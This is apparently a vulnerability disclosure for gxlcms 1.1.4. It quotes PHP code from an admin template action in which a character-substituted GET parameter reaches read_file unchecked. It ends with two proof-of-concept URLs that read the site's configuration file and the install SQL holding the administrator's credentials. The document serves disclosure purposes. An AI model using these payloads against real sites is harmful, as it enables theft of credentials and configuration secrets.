/
gxlcms1.1.4
36 lines (31 loc) · 1.22 KB
/
gxlcms1.1.4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
There is an arbitrary file read vulnerability on gxlcms1.1.4
Description:
There is an arbitrary file read vulnerability on /WWW/gxlcms/Lib/Common/Admin/function.php
It allows an attacker to read arbitrary files
Vulnerability page
1. /www/Lib/Lib/Action/Admin/TplAction.class.php:
...
public function add(){
$filename = admin_ff_url_repalce(str_replace('*','.',trim($_GET['id']))); //Focus on the admin_ff_url_repalce function.
if (empty($filename)) {
$this->error('模板名称不能为空!');
}
$content = read_file($filename);
$this->assign('filename',$filename);
$this->assign('content',htmlspecialchars($content));
$this->display('./Public/system/tpl_add.html');
}
...
2. /WWW/gxlcms/Lib/Common/Admin/function.php
....
function admin_ff_url_repalce($xmlurl,$order='asc'){
if($order=='asc'){
return str_replace(array('|','@','#','||'),array('/','=','&','//'),$xmlurl);
}else{
return str_replace(array('/','=','&','||'),array('|','@','#','//'),$xmlurl);
}
}
...
POC:
http://127.0.0.1/index.php?s=Admin-Tpl-ADD-id-.|Runtime|Conf||config*php //Read the configuration file of the website
http://127.0.0.1/index.php?s=Admin-Tpl-ADD-id-.|Runtime|Install||install*sql //Read the administrator's password and account